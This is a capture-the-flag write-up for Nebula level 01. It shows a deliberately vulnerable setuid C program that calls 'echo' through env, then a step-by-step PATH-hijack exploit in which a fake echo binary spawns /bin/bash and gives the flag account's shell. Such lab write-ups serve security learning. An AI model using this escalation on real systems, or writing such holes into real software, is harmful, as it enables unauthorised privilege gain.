# Nebula - 01

> *There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the* `level01` account with the password `level01`. Files for this level can be found in the `/home/flag01` directory.

### **Source code**

```c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}
```

### **Getting the flag**

First, let’s log in via `ssh` and check the binary at `/home/flag01`.

```bash
level01@nebula:/home/flag01$ ./flag01 
and now what?
```

From the quick audit of the source code, we can see that `echo` is called by the relative path instead of the absolute one (`echo` instead of `/bin/echo`). We can abuse that and create another binary named `echo` in another location and add it to the `$PATH`, so Linux will prioritize our “malicious” binary instead of the right one.

Let’s create a new folder in `/tmp` and write a simple program there:

```bash
flag01@nebula:~$ cd /tmp
flag01@nebula:/tmp$ mkdir level01 && cd level01
flag01@nebula:/tmp/level01$ nano echo.c
```

Our `echo` will simply call the `/bin/bash`. It could be anything, really, but I prefer to spawn a shell if I have a chance to do so.

```bash
#include<stdio.h>

int main()
{
  system("/bin/bash");
}
```

Compile that program with `gcc`

```bash
flag01@nebula:/tmp/level01$ gcc echo.c -o echo
```

Let’s check the content of the `$PATH` variable:

```bash
flag01@nebula:/tmp/level01$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
```

We can add our folder with the binary to the global `$PATH`:

```bash
flag01@nebula:/tmp/level01$ PATH=/tmp/level01:$PATH

flag01@nebula:/tmp/level01$ echo $PATH
/tmp/level01:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
```

Alright, now when we will execute the binary in the `/home/flag01` it will call our `echo` and spawn a shell:

```bash
flag01@nebula:/tmp/level01$ /home/flag01/flag01 
flag01@nebula:/tmp/level01$ getflag 
You have successfully executed getflag on a target account
```
